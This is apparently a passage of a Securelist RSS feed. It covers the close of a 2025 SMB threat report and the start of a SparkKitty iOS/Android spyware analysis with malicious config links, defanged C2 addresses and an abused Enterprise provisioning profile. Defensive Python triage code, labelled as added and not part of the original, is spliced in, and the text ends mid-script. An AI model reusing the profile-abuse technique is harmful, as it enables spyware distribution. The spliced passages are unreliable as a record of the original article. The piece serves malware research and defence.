<td><strong>2025 vs 2024</strong></td>
</tr>
<tr>
<td>Zoom</td>
<td>26.24%</td>
<td>40.86%</td>
<td>14.62 p.p.</td>
</tr>
<tr>
<td>Microsoft Teams</td>
<td>1.84%</td>
<td>5.10%</td>
<td>3.25 p.p.</td>
</tr>
<tr>
<td>ChatGPT</td>
<td>1.47%</td>
<td>4.38%</td>
<td>2.9 p.p.</td>
</tr>
<tr>
<td>DeepSeek</td>
<td>0</td>
<td>2.05%</td>
<td>–</td>
</tr>
<tr>
<td>Google Drive</td>
<td>2.11%</td>
<td>3.26%</td>
<td>1.15 p.p.</td>
</tr>
</tbody>
</table>
<p>The total number of unique malicious and unwanted files imitating legitimate applications slightly declined year-over-year, from 5,587 in 2024 to 4,043 in 2025.</p>
<p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Main types of threats affecting the SMB Sector, 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235226/02-EN-SMB-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
<p>The top threats targeting SMBs in 2025 included downloaders, Trojans, and adware.</p>
<p>Leading the list are <strong>downloaders</strong>, potentially unwanted applications designed to install additional content from the internet, often without clearly informing the user of what’s being downloaded. While not inherently malicious, these tools are frequently exploited by attackers to deliver harmful payloads to victims’ devices.</p>
<p><strong>Trojans</strong> ranked next. These are malicious programs that carry out unauthorized actions such as deleting, blocking, modifying, or copying data, or disrupting the normal operation of computers and networks. Trojans are among the most prevalent forms of malware, and cyberattackers continue to use them in a wide range of malicious campaigns.</p>
<p>Adware also made the top three list. These programs are designed to display advertisements on infected computers or substitute a promotional website for the default search engine in a browser. Adware often comes bundled with freeware or shareware, effectively serving as the price for using the free software. In some cases, Trojans silently download and install adware onto the victim’s machine.</p>
<p>Among other common types of threats were DangerousObject, Trojan-Dropper, Backdoor, Trojan-Downloader, HackTool, Trojan-PSW, and PSW-Tool. For instance, we recently identified a campaign involving a Trojan-Downloader called “<a href="https://securelist.com/tookps/116019/" target="_blank" rel="noopener">TookPS</a>”, which was distributed through fake websites imitating legitimate remote access and 3D modeling software.</p>
<h2 id="how-scammers-and-phishers-trick-victims-into-giving-up-accounts-and-money">How scammers and phishers trick victims into giving up accounts and money</h2>
<p>We continue to observe a wide range of phishing campaigns and scams targeting SMBs. Attackers aim to steal login credentials for various services, from delivery platforms to banking systems, or manipulate victims into sending them money.</p>
<p>To do this, cyberattackers use a variety of lures, often imitating landing pages of brands commonly used by SMBs. One example is a phishing attempt targeting Google business accounts. The bait is a promise to promote the victim’s company on X; to claim it, the victim must first sign in to a “dedicated platform” with their Google account, and those credentials end up in the attackers’ hands.</p>
<p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235324/smb-threat-report3.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-116837" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235324/smb-threat-report3.png" alt="" width="1307" height="1090" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235324/smb-threat-report3.png 1307w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235324/smb-threat-report3-300x250.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235324/smb-threat-report3-1024x854.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235324/smb-threat-report3-768x640.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235324/smb-threat-report3-420x350.png 420w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235324/smb-threat-report3-740x617.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235324/smb-threat-report3-336x280.png 336w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235324/smb-threat-report3-800x667.png 800w" sizes="auto, (max-width: 1307px) 100vw, 1307px" /></a></p>
<p>Another fake landing page impersonated a bank that offered business loans: a “Global Trust Bank”. Since legitimate organizations with that name exist in multiple countries, this phishing attempt may have seemed believable. The attackers tried to lure users with favorable business loan terms – but only after victims submitted their online banking credentials, giving the criminals access to their accounts.</p>
<p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235355/smb-threat-report4.jpg" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-116838" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235355/smb-threat-report4.jpg" alt="" width="1280" height="960" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235355/smb-threat-report4.jpg 1280w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235355/smb-threat-report4-300x225.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235355/smb-threat-report4-1024x768.jpg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235355/smb-threat-report4-768x576.jpg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235355/smb-threat-report4-200x150.jpg 200w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235355/smb-threat-report4-467x350.jpg 467w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235355/smb-threat-report4-740x555.jpg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235355/smb-threat-report4-373x280.jpg 373w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235355/smb-threat-report4-800x600.jpg 800w" sizes="auto, (max-width: 1280px) 100vw, 1280px" /></a></p>
<p>We also saw a range of phishing emails targeting SMBs. In one recent case detected by our systems, the attacker sent a fake notification allegedly from DocuSign, an electronic document-signing service.</p>
<p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235432/smb-threat-report5.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-116839" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235432/smb-threat-report5.png" alt="" width="1349" height="976" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235432/smb-threat-report5.png 1349w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235432/smb-threat-report5-300x217.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235432/smb-threat-report5-1024x741.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235432/smb-threat-report5-768x556.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235432/smb-threat-report5-484x350.png 484w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235432/smb-threat-report5-740x535.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235432/smb-threat-report5-387x280.png 387w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235432/smb-threat-report5-800x579.png 800w" sizes="auto, (max-width: 1349px) 100vw, 1349px" /></a></p>
<p>SMBs can even find themselves targeted by classic Nigerian (advance-fee) scams. In one recent example, the sender claimed to represent a wealthy client from Turkey who wanted to move $33 million abroad to allegedly avoid sanctions, and invited the recipient to handle the funds. The goal of such scams is always to extract money from the victim: once the target is hooked, the fraudsters ask for a payment to a “manager” or “lawyer” that is small compared to the sum originally promised, and that payment is the scam.</p>
<p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235511/smb-threat-report6.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-116840" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235511/smb-threat-report6.png" alt="" width="1436" height="285" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235511/smb-threat-report6.png 1436w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235511/smb-threat-report6-300x60.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235511/smb-threat-report6-1024x203.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235511/smb-threat-report6-768x152.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235511/smb-threat-report6-740x147.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235511/smb-threat-report6-1411x280.png 1411w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235511/smb-threat-report6-800x159.png 800w" sizes="auto, (max-width: 1436px) 100vw, 1436px" /></a></p>
<p>Beyond these threats, SMBs are bombarded daily with hundreds of spam emails. Some promise attractive deals on email marketing or loans; others offer services like reputation management, content creation, or lead generation. In general, these offers are crafted to reflect the typical needs of small businesses. Not surprisingly, AI has also made its way into the spam folder – with offers to automate various business processes.</p>
<p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235613/smb-threat-report7.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-116841" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235613/smb-threat-report7.png" alt="" width="1856" height="936" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235613/smb-threat-report7.png 1856w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235613/smb-threat-report7-300x151.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235613/smb-threat-report7-1024x516.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235613/smb-threat-report7-768x387.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235613/smb-threat-report7-1536x775.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235613/smb-threat-report7-694x350.png 694w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235613/smb-threat-report7-740x373.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235613/smb-threat-report7-555x280.png 555w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235613/smb-threat-report7-800x403.png 800w" sizes="auto, (max-width: 1856px) 100vw, 1856px" /></a></p>
<p>We have also seen spammers offering dubious deals like purchasing a database of over 400,000 businesses for $100, supposedly to be used for selling the company’s B2B products, or manipulating reviews on a review platform.</p>
<p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235758/smb-threat-report8.jpg" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-116842" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235758/smb-threat-report8.jpg" alt="" width="1408" height="921" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235758/smb-threat-report8.jpg 1408w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235758/smb-threat-report8-300x196.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235758/smb-threat-report8-1024x670.jpg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235758/smb-threat-report8-768x502.jpg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235758/smb-threat-report8-535x350.jpg 535w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235758/smb-threat-report8-740x484.jpg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235758/smb-threat-report8-428x280.jpg 428w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235758/smb-threat-report8-800x523.jpg 800w" sizes="auto, (max-width: 1408px) 100vw, 1408px" /></a></p>
<p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235827/smb-threat-report9.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-116843" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235827/smb-threat-report9.png" alt="" width="864" height="469" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235827/smb-threat-report9.png 864w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235827/smb-threat-report9-300x163.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235827/smb-threat-report9-768x417.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235827/smb-threat-report9-645x350.png 645w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235827/smb-threat-report9-740x402.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235827/smb-threat-report9-516x280.png 516w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235827/smb-threat-report9-800x434.png 800w" sizes="auto, (max-width: 864px) 100vw, 864px" /></a></p>
<h2 id="security-tips">Security tips</h2>
<p>SMBs can reduce risks and ensure business continuity by investing in comprehensive cybersecurity solutions and increasing employee awareness. It is essential to implement robust measures such as spam filters, email authentication protocols, and strict verification procedures for financial transactions and the handling of sensitive information.</p>
<p>Another key step toward cyber resilience is promoting awareness about the importance of comprehensive security procedures and ensuring they are regularly updated. Regular security training sessions, strong password practices, and multi-factor authentication can significantly reduce the risk of phishing and fraud.</p>
<p>It is also worth noting that searching for software through search engines is an insecure practice, and should be prohibited in the organization. If you need to implement new tools or replace existing ones, make sure they are downloaded from official sources and installed on a centralized basis by your IT team.</p>
<p><strong>Cybersecurity Action Plan for SMBs</strong></p>
<ol>
<li><strong>Define access rules for corporate resources</strong> such as email accounts, shared folders, and online documents. Monitor and limit the number of individuals with access to critical company data. Keep access lists up to date and revoke access promptly when employees leave the company. Use cloud access security brokers to monitor and control employee activities within cloud services and enforce security policies.</li>
<li><strong>Regularly back up important data</strong> to ensure the preservation of corporate information in case of emergencies or cyberincidents.</li>
<li><strong>Establish clear guidelines for using external services and resources.</strong> Create well-defined procedures for coordinating specific tasks, such as implementing new software, with the IT department and other responsible managers. Develop short, easy-to-understand cybersecurity guidelines for employees, with a special focus on account and password management, email protection, and safe web browsing. A well-rounded training program will equip employees with the knowledge they need and the ability to apply it in practice.</li>
<li><strong>Implement specialized cybersecurity solutions</strong> that provide visibility and control over cloud services, such as <a href="https://www.kaspersky.com/next?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___knext____7a48716a2c69383d" target="_blank" rel="noopener">Kaspersky Next</a>.</li>
</ol>
]]></content:encoded>
<wfw:commentRss>https://securelist.com/smb-threat-report-2025/116830/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24201202/SL-SMB-threat-report-2025-featured.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24201202/SL-SMB-threat-report-2025-featured-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24201202/SL-SMB-threat-report-2025-featured-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24201202/SL-SMB-threat-report-2025-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
</item>
<item>
<title>SparkKitty, SparkCat’s little brother: A new Trojan spy found in the App Store and Google Play</title>
<link>https://securelist.com/sparkkitty-ios-android-malware/116793/</link>
<comments>https://securelist.com/sparkkitty-ios-android-malware/116793/#respond</comments>
<dc:creator><![CDATA[Sergey Puzan, Dmitry Kalinin]]></dc:creator>
<pubDate>Mon, 23 Jun 2025 08:00:37 +0000</pubDate>
<category><![CDATA[Malware descriptions]]></category>
<category><![CDATA[Malware Technologies]]></category>
<category><![CDATA[Google Android]]></category>
<category><![CDATA[Mobile Malware]]></category>
<category><![CDATA[Apple iOS]]></category>
<category><![CDATA[Malware Descriptions]]></category>
<category><![CDATA[Malware]]></category>
<category><![CDATA[Trojan]]></category>
<category><![CDATA[Cryptocurrencies]]></category>
<category><![CDATA[Trojan-Spy]]></category>
<category><![CDATA[SparkCat]]></category>
<category><![CDATA[SparkKitty]]></category>
<category><![CDATA[Mobile threats]]></category>
<guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=116793</guid>
<description><![CDATA[SparkKitty, a new Trojan spy for iOS and Android, spreads through untrusted websites, the App Store, and Google Play, stealing images from users' galleries.]]></description>
<content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23070415/SL-SparkKitty-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p><em>Update 25.06.2025: Apple removed the malicious app from the App Store.</em></p>
<p>In January 2025, we uncovered the <a href="https://securelist.com/sparkcat-stealer-in-app-store-and-google-play/115385/" target="_blank" rel="noopener">SparkCat spyware campaign</a>, which was aimed at gaining access to victims’ crypto wallets. The threat actor distributed apps containing a malicious SDK/framework. This component would wait for a user to open a specific screen (typically a support chat), then request access to the device’s gallery. It would then use an OCR model to select and exfiltrate images of interest. Although SparkCat was capable of searching for any text within images, that campaign specifically targeted photos containing seed phrases for crypto wallets. The malware was distributed through unofficial sources as well as Google Play and the App Store. Now, we’ve once again come across a new type of spyware that has managed to infiltrate the official app stores. We believe it is connected to SparkCat and also targets the cryptocurrency assets of its victims.</p>
<p>Here are the key facts about this new threat:</p>
<ul>
<li>The malware targets both iOS and Android devices, and it is spreading in the wild as well as through the App Store and Google Play. The apps have since been removed from both stores (see the update above).</li>
<li>On iOS, the malicious payload is delivered as frameworks (primarily mimicking AFNetworking.framework or Alamofire.framework) or obfuscated libraries disguised as libswiftDarwin.dylib, or it can be embedded directly into the app itself.</li>
<li>The Android-specific Trojan comes in both Java and Kotlin flavors; the Kotlin version is a malicious Xposed module.</li>
<li>While most versions of this malware indiscriminately steal all images, we discovered a related malicious activity cluster that uses OCR to pick specific pictures.</li>
<li>The campaign has been active since at least February 2024.</li>
</ul>
<h2 id="it-all-began-with-a-suspicious-online-store">It all began with a suspicious online store…</h2>
<p>During routine monitoring of suspicious links, we stumbled upon several similar-looking pages that were distributing TikTok mods for Android. In these modified versions, the app’s main activities would trigger additional code. The code would then request a Base64-encoded configuration file from <strong>hxxps://moabc[.]vip/?dev=az</strong>. A sample decoded configuration file is shown below.</p><pre class="urvanov-syntax-highlighter-plain-tag">{
"links": {
"shopCenter": "https://h1997.tiktokapp.club/wap/?",
"goodsList": "https://h1997.tiktokapp.club/www/?",
"orderList": "https://h1997.tiktokapp.club/www/?",
"reg": "https://www.baidu.com",
"footbar": "https://www.baidu.com"
}
}</pre><p>
The links from the configuration file were displayed as buttons within the app. Tapping them opened the URL in a WebView, revealing an online store named TikToki Mall that accepted cryptocurrency as payment for consumer goods. Unfortunately, we couldn’t verify whether it was a legitimate store, as users had to register with an invitation code to make a purchase.</p>
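<p>The configuration format described above, handled as an added example that is not part of the original article: a small Python triage helper that decodes the Base64 blob, parses the JSON and sorts each link by its host. The sample blob is constructed from the decoded file shown above; the allowlist of genuine TikTok domains and the set of placeholder search-engine domains are assumptions made for the example.</p>

```python
import base64
import json
from urllib.parse import urlparse

# Hosts a genuine TikTok build is expected to contact (assumed allowlist for this example).
EXPECTED_DOMAINS = {"tiktok.com", "tiktokv.com", "tiktokcdn.com"}
# Search-engine domains the mod uses to fill unused link slots (assumption).
PLACEHOLDER_DOMAINS = {"baidu.com", "google.com"}

# Constructed sample: the decoded configuration quoted above, re-encoded the way the
# mod receives it (Base64, with the trailing '=' padding stripped as many servers do).
SAMPLE_CONFIG_JSON = json.dumps({
    "links": {
        "shopCenter": "https://h1997.tiktokapp.club/wap/?",
        "goodsList": "https://h1997.tiktokapp.club/www/?",
        "orderList": "https://h1997.tiktokapp.club/www/?",
        "reg": "https://www.baidu.com",
        "footbar": "https://www.baidu.com",
    }
})
SAMPLE_CONFIG_B64 = base64.b64encode(SAMPLE_CONFIG_JSON.encode()).decode().rstrip("=")


def decode_config(blob: str) -> dict:
    """Base64-decode a config blob and parse it as JSON.

    Restores stripped padding and falls back to the URL-safe alphabet, two
    variations that routinely break naive decoders in triage scripts.
    """
    blob = "".join(blob.split())              # drop whitespace and newlines
    blob += "=" * (-len(blob) % 4)            # restore padding
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        raw = base64.urlsafe_b64decode(blob)
    return json.loads(raw.decode("utf-8"))


def registrable_domain(host: str) -> str:
    """Crude eTLD+1 (last two labels): enough for triage, not for policy decisions."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def triage_links(config: dict) -> dict:
    """Map each link name to 'expected', 'placeholder' or 'suspicious'."""
    verdicts = {}
    for name, url in config.get("links", {}).items():
        parts = urlparse(url)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            verdicts[name] = "suspicious"      # javascript:, intent:, file: and friends
            continue
        domain = registrable_domain(parts.hostname)
        if domain in EXPECTED_DOMAINS:
            verdicts[name] = "expected"
        elif domain in PLACEHOLDER_DOMAINS:
            verdicts[name] = "placeholder"
        else:
            verdicts[name] = "suspicious"      # look-alike such as tiktokapp.club
    return verdicts


def suspicious_hosts(config: dict) -> set:
    """Hostnames worth blocking or pivoting on: the mod's own infrastructure."""
    verdicts = triage_links(config)
    return {
        urlparse(config["links"][name]).hostname
        for name, verdict in verdicts.items()
        if verdict == "suspicious"
    }


if __name__ == "__main__":
    cfg = decode_config(SAMPLE_CONFIG_B64)
    for name, verdict in triage_links(cfg).items():
        print(f"{name:11} {verdict:11} {cfg['links'][name]}")
    print("suspicious hosts:", sorted(suspicious_hosts(cfg)))
```

<p>On the sample config the look-alike host <code>h1997.tiktokapp.club</code> is the only one flagged, while the <code>baidu.com</code> slots are recognised as unused placeholders rather than noise. The domain helper deliberately avoids a public-suffix list so the script stays dependency-free; for anything beyond triage, swap in a proper eTLD+1 lookup.</p>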
<p>Although we didn’t find any other suspicious functionality within the apps, a gut feeling told us to dig deeper. We decided to examine the code of the web pages distributing the apps, only to find a number of interesting details suggesting they might also be pushing iOS apps.</p><pre class="urvanov-syntax-highlighter-plain-tag"><div class="t-name">
<div class="tit">
{{if ext=="ipa"}}
<i class="iconfont icon-iphone" style="font-size:inherit;margin-right:5px"></i>
{{else}}
<i class="iconfont icon-android" style="font-size:inherit;margin-right:5px"></i>
{{/if}}</pre>
<h2 id="ios-app-delivery-method">iOS app delivery method</h2>
<p>And sure enough, visiting the website on an iPhone triggers a series of redirects, ultimately landing the user on a page that crudely mimics the App Store and prompts them to download an app.</p>
<div id="attachment_116795" style="width: 483px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235345/sparkkitty-ios1.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116795" class="size-full wp-image-116795" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235345/sparkkitty-ios1.png" alt="iOS app download page" width="946" height="2048" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235345/sparkkitty-ios1.png 946w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235345/sparkkitty-ios1-139x300.png 139w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235345/sparkkitty-ios1-473x1024.png 473w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235345/sparkkitty-ios1-768x1663.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235345/sparkkitty-ios1-710x1536.png 710w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235345/sparkkitty-ios1-162x350.png 162w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235345/sparkkitty-ios1-462x1000.png 462w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235345/sparkkitty-ios1-129x280.png 129w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235345/sparkkitty-ios1-416x900.png 416w" sizes="auto, (max-width: 946px) 100vw, 946px" /></a><p id="caption-attachment-116795" class="wp-caption-text">iOS app download page</p></div>
<p>As you know, iOS doesn’t just let you download and run any app from a third-party source. However, Apple provides members of the Apple Developer Program with so-called provisioning profiles. These allow a developer certificate to be installed on a user device. iOS then uses this certificate to verify the app’s digital signature and determine if it can be launched. Besides the certificate, a provisioning profile contains its expiration date and the permissions to be granted to the app, as well as other information about the developer and the app. Once the profile is installed on a device, the certificate becomes trusted, allowing the app to run.</p>
<p>Provisioning profiles come in several types. Development profiles are used for testing apps and can only be installed on a predefined list of devices (Ad Hoc distribution profiles carry a fixed device list as well). App Store distribution profiles allow an app to be submitted to the App Store. Enterprise profiles were created to let organizations develop internal-use apps and install them on employees’ devices without publishing them on the App Store and without any restriction on which devices they can be installed on. Although the Apple Developer Enterprise Program requires a paid membership and verification of the organization by Apple, Enterprise profiles are frequently abused. They are used not only by developers of apps unsuitable for the App Store (online casinos, cracks, cheats, or illegal mods of popular apps) but also by malware creators.</p><pre class="urvanov-syntax-highlighter-plain-tag"><?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>AppIDName</key>
<string>rdcUniApp</string>
<key>ApplicationIdentifierPrefix</key>
<array>
<string>EHQ3N2D5WH</string>
</array>
<key>CreationDate</key>
<date>2025-01-20T06:59:55Z</date>
<key>Platform</key>
<array>
<string>iOS</string>
<string>xrOS</string>
<string>visionOS</string>
</array>
<key>IsXcodeManaged</key>
<false/>
<key>DeveloperCertificates</key>
<array>
<data>OMITTED</data>
</array>
<key>DER-Encoded-Profile</key>
<data>OMITTED</data>
<key>Entitlements</key>
<dict>
<key>application-identifier</key>
<string>EHQ3N2D5WH.com.ss-tpc.rd.rdcUniApp</string>
<key>keychain-access-groups</key>
<array>
<string>EHQ3N2D5WH.*</string>
<string>com.apple.token</string>
</array>
<key>get-task-allow</key>
<false/>
<key>com.apple.developer.team-identifier</key>
<string>EHQ3N2D5WH</string>
</dict>
<key>ExpirationDate</key>
<date>2026-01-20T06:59:55Z</date>
<key>Name</key>
<string>syf</string>
<key>ProvisionsAllDevices</key>
<true/>
<key>TeamIdentifier</key>
<array>
<string>EHQ3N2D5WH</string>
</array>
<key>TeamName</key>
<string>SINOPEC SABIC Tianjin Petrochemical Co. Ltd.</string>
<key>TimeToLive</key>
<integer>365</integer>
<key>UUID</key>
<string>55b65f87-9102-4cb9-934a-342dd2be8e25</string>
<key>Version</key>
<integer>1</integer>
</dict>
</plist></pre><p>
<center><em><strong>Example of a provisioning profile installed to run a malicious TikTok mod</strong></em></center></p>
<p>In the case of the malicious TikTok mods, the attackers used an Enterprise profile, as indicated by the following key in its body:</p><pre class="urvanov-syntax-highlighter-plain-tag"><key>ProvisionsAllDevices</key>
<true/></pre><p>
It’s worth noting that installing any provisioning profile requires direct user interaction, which looks like this:</p>
<div id="attachment_116796" style="width: 2058px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235703/sparkkitty-ios2.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116796" class="size-full wp-image-116796" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235703/sparkkitty-ios2.png" alt="Profile installation flow" width="2048" height="1454" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235703/sparkkitty-ios2.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235703/sparkkitty-ios2-300x213.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235703/sparkkitty-ios2-1024x727.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235703/sparkkitty-ios2-768x545.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235703/sparkkitty-ios2-1536x1091.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235703/sparkkitty-ios2-493x350.png 493w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235703/sparkkitty-ios2-740x525.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235703/sparkkitty-ios2-394x280.png 394w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235703/sparkkitty-ios2-800x568.png 800w" sizes="auto, (max-width: 2048px) 100vw, 2048px" /></a><p id="caption-attachment-116796" class="wp-caption-text">Profile installation flow</p></div>
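<p>The profile-type check described above (an Enterprise profile is recognised by <code>ProvisionsAllDevices</code>), as an added example and not the authors’ tooling: a Python triage script that cuts the plist out of a <code>.mobileprovision</code> file and classifies it. The sample profile is constructed from the one quoted above with the certificate data removed and a few arbitrary bytes standing in for the CMS signature envelope; the classification rules (Enterprise, Development, Ad Hoc, App Store) follow Apple’s documented profile types, and the <code>now</code> parameter exists only to make the expiry check reproducible.</p>

```python
import plistlib
from datetime import datetime, timezone
from typing import Union

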